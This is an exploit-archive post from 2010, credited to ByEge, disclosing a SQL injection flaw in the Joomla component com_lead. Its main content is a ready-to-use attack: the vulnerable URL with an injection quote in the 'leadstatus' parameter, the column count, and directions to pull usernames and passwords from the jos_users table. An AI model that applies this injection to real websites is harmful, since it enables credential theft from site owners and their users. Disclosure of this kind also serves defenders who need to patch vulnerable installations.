Joomla Component com_lead SQL Injection

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component com_lead SQL Injection
# Published : 2010-06-03
# Author : ByEge
# Previous Title : clickartweb Design SQL Injection Vulnerability
# Next Title : Joomla Component ChronoConnectivity

[TR] Title: Joomla Component com_lead SQL Injection 

[TR] Date: 03.06.2010

[TR] Author: ByEge

[TR] Homepage: byege.blogspot.com

[TR] Vendor: http://www.leadya.co.il/

[TR] ExploiT :

[TR] index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1' 

[TR] column number : 14 
[TR] column name : username , password
[TR] table name : jos_users

[TR] Th4nks : KaTLiaMCi06 , Fantastik, MitolocyA, ISYAN